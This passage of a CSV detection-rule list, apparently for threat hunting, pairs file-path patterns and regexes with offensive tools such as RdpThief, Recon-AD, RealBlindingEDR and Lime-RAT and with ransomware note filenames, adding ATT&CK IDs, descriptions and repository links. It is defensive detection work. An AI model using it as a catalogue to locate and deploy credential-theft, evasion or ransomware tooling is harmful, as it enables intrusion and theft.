"*\RDPMITM.py*",".{0,1000}\\RDPMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","17793" "*\RdpStrike.asm*",".{0,1000}\\RdpStrike\.asm.{0,1000}","offensive_tool_keyword","RdpStrike","Positional Independent Code to extract clear text password from mstsc.exe using API Hooking via HWBP","T1081 - T1055.011 - T1012 - T1113 - T1040 - T1185","TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/0xEr3bus/RdpStrike","1","0","N/A","N/A","10","3","238","27","2024-06-11T19:40:05Z","2024-06-11T19:31:50Z","17794" "*\RdpStrike.cna*",".{0,1000}\\RdpStrike\.cna.{0,1000}","offensive_tool_keyword","RdpStrike","Positional Independent Code to extract clear text password from mstsc.exe using API Hooking via HWBP","T1081 - T1055.011 - T1012 - T1113 - T1040 - T1185","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xEr3bus/RdpStrike","1","0","N/A","N/A","10","3","238","27","2024-06-11T19:40:05Z","2024-06-11T19:31:50Z","17795" "*\RdpStrike\*",".{0,1000}\\RdpStrike\\.{0,1000}","offensive_tool_keyword","RdpStrike","Positional Independent Code to extract clear text password from mstsc.exe using API Hooking via HWBP","T1081 - T1055.011 - T1012 - T1113 - T1040 - T1185","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xEr3bus/RdpStrike","1","0","N/A","N/A","10","3","238","27","2024-06-11T19:40:05Z","2024-06-11T19:31:50Z","17796" "*\RdpThief.*",".{0,1000}\\RdpThief\..{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","0","N/A","N/A","10","10","1311","361","2024-07-20T06:58:02Z","2019-11-03T17:54:38Z","17797" "*\RdpThief.cna*",".{0,1000}\\RdpThief\.cna.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","17798" "*\RdpThief.dll*",".{0,1000}\\RdpThief\.dll.{0,1000}","offensive_tool_keyword","Invoke-RDPThief","perform process injection on the target process and inject RDPthief into the process in order to capture cleartext credentials","T1055 - T1056 - T1071 - T1110","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/The-Viper-One/Invoke-RDPThief","1","0","N/A","N/A","10","1","62","8","2025-01-21T20:12:33Z","2024-10-01T20:12:00Z","17799" "*\RdpThief_x64.*",".{0,1000}\\RdpThief_x64\..{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","0","N/A","N/A","10","10","1311","361","2024-07-20T06:58:02Z","2019-11-03T17:54:38Z","17800" "*\RdpThief_x64.tmp*",".{0,1000}\\RdpThief_x64\.tmp.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","17801" "*\rdpv.exe*",".{0,1000}\\rdpv\.exe.{0,1000}","offensive_tool_keyword","rdpv","RemoteDesktopPassView is a small utility that reveals the password stored by Microsoft Remote Desktop Connection utility inside the .rdp 
files.","T1110 - T1560.001 - T1555.003 - T1212","TA0006 - TA0007","N/A","Phobos - GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/remote_desktop_password.html","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A","17802" "*\README.BlackSuit.txt*",".{0,1000}\\README\.BlackSuit\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","17813" "*\README_FOR_DECRYPT.txtt*",".{0,1000}\\README_FOR_DECRYPT\.txtt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","17814" "*\readme_for_unlock.txt*",".{0,1000}\\readme_for_unlock\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","17815" "*\readme_for_unlock_2.txt*",".{0,1000}\\readme_for_unlock_2\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","17816" "*\readme_for_unlock_3.txt*",".{0,1000}\\readme_for_unlock_3\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes 
archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","17817" "*\README_TO_DECRYPT.txt*",".{0,1000}\\README_TO_DECRYPT\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","17818" "*\READ-ME-NOW.txt*",".{0,1000}\\READ\-ME\-NOW\.txt.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","17819" "*\ReadPEInMemory.exe*",".{0,1000}\\ReadPEInMemory\.exe.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","17820" "*\RealBlindingEDR.vcxproj*",".{0,1000}\\RealBlindingEDR\.vcxproj.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense 
Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","N/A","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","17821" "*\RealBlindingEDR\*",".{0,1000}\\RealBlindingEDR\\.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","N/A","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","17822" "*\Realistic Format Virus.exe*",".{0,1000}\\Realistic\sFormat\sVirus\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17823" "*\Reaper\Reaper.cpp*",".{0,1000}\\Reaper\\Reaper\.cpp.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","N/A","10","2","158","34","2024-12-07T01:52:58Z","2023-09-21T02:09:48Z","17825" "*\Reaper-main\*.sys*",".{0,1000}\\Reaper\-main\\.{0,1000}\.sys.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. 
This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","N/A","10","2","158","34","2024-12-07T01:52:58Z","2023-09-21T02:09:48Z","17826" "*\REC2-main.zip*",".{0,1000}\\REC2\-main\.zip.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","17827" "*\recaptcha-phish-main*",".{0,1000}\\recaptcha\-phish\-main.{0,1000}","offensive_tool_keyword","recaptcha-phish","Phishing with a fake reCAPTCHA","T1566.001 - T1204.002 - T1071.003","TA0001 - TA0002","Lumma Stealer","N/A","Phishing","https://github.com/JohnHammond/recaptcha-phish","1","0","N/A","N/A","10","6","534","104","2024-09-13T11:18:29Z","2024-09-13T07:00:40Z","17828" "*\Recon.tests.ps1*",".{0,1000}\\Recon\.tests\.ps1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","17829" "*\Recon-AD-AllLocalGroups.dll",".{0,1000}\\Recon\-AD\-AllLocalGroups\.dll","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17830" "*\Recon-AD-AllLocalGroups.dll*",".{0,1000}\\Recon\-AD\-AllLocalGroups\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","17831" "*\Recon-AD-AllLocalGroups.sln*",".{0,1000}\\Recon\-AD\-AllLocalGroups\.sln.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17832" "*\Recon-AD-AllLocalGroups\*",".{0,1000}\\Recon\-AD\-AllLocalGroups\\.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17833" "*\Recon-AD-Computers.dll",".{0,1000}\\Recon\-AD\-Computers\.dll","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17834" "*\Recon-AD-Computers.dll*",".{0,1000}\\Recon\-AD\-Computers\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","17835" "*\Recon-AD-Computers.sln*",".{0,1000}\\Recon\-AD\-Computers\.sln.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17836" "*\Recon-AD-Computers\*",".{0,1000}\\Recon\-AD\-Computers\\.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17837" "*\Recon-AD-Domain.dll",".{0,1000}\\Recon\-AD\-Domain\.dll","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17838" "*\Recon-AD-Domain.dll*",".{0,1000}\\Recon\-AD\-Domain\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","17839" "*\Recon-AD-Domain.sln*",".{0,1000}\\Recon\-AD\-Domain\.sln.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17840" "*\Recon-AD-Domain\*",".{0,1000}\\Recon\-AD\-Domain\\.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17841" "*\Recon-AD-Groups.dll",".{0,1000}\\Recon\-AD\-Groups\.dll","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17842" "*\Recon-AD-Groups.dll*",".{0,1000}\\Recon\-AD\-Groups\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","17843" "*\Recon-AD-Groups.sln*",".{0,1000}\\Recon\-AD\-Groups\.sln.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17844" "*\Recon-AD-LocalGroups.dll*",".{0,1000}\\Recon\-AD\-LocalGroups\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","17845" "*\Recon-AD-LocalGroups.dll*",".{0,1000}\\Recon\-AD\-LocalGroups\.dll.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17846" "*\Recon-AD-LocalGroups.sln*",".{0,1000}\\Recon\-AD\-LocalGroups\.sln.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - 
TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17847" "*\Recon-AD-LocalGroups\*",".{0,1000}\\Recon\-AD\-LocalGroups\\.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17848" "*\Recon-AD-master*",".{0,1000}\\Recon\-AD\-master.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17849" "*\Recon-AD-SPNs.dll*",".{0,1000}\\Recon\-AD\-SPNs\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","17850" "*\Recon-AD-SPNs.sln*",".{0,1000}\\Recon\-AD\-SPNs\.sln.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - 
TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17851" "*\Recon-AD-SPNs\*",".{0,1000}\\Recon\-AD\-SPNs\\.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17852" "*\Recon-AD-Users.dll*",".{0,1000}\\Recon\-AD\-Users\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","17853" "*\Recon-AD-Users.dll*",".{0,1000}\\Recon\-AD\-Users\.dll.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17854" "*\Recon-AD-Users.sln*",".{0,1000}\\Recon\-AD\-Users\.sln.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - 
TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17855" "*\RECOVER-FILES.txt*",".{0,1000}\\RECOVER\-FILES\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","17856" "*\RECOVERY_DARKBIT.txt*",".{0,1000}\\RECOVERY_DARKBIT\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","17857" "*\RECOVERY_INSTRUCTIONS.txt*",".{0,1000}\\RECOVERY_INSTRUCTIONS\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","17858" "*\RecycledGate.c*",".{0,1000}\\RecycledGate\.c.{0,1000}","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","0","N/A","N/A","N/A","3","266","43","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z","17859" "*\RedBackdoorer.py*",".{0,1000}\\RedBackdoorer\.py.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource 
